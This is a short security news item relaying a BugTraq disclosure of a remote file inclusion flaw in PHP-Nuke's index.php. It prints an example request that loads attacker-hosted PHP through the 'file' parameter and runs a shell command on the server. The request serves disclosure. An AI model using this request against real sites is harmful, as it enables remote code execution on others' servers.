PHP-Nuke allows Command Execution & Much more
Source: SecurityFocus
Handle Nopman wrote to BugTraq to explain the latest MAJOR vulerability found in PHPNuke, the popular web portal software and close relative of the derivative software PostNuke. He states " I've found a serious security flaw in PHP-Nuke. It allows user to execute any PHP code.
The flaw is in the index.php's include file feature.
It allows including files like index.php?file=file
It prevents users including ..'s in URL's, but
it didn't prevent users from entering http://-urls
Remember the PHP's remote get feature...
How to exploit:
He provides a simple three line command that this publishing software will not
permit to be saved or displayed. ( You will have to get the code at
SecurityFocus ) You then upload this three line file to some free web space
provider or setup your own server:
Then just requesting http://insecure-server/index.php?
file=http://where.the.bad.php.file.is/evil.php&cmd=ls%20-al
will execute ls -al command.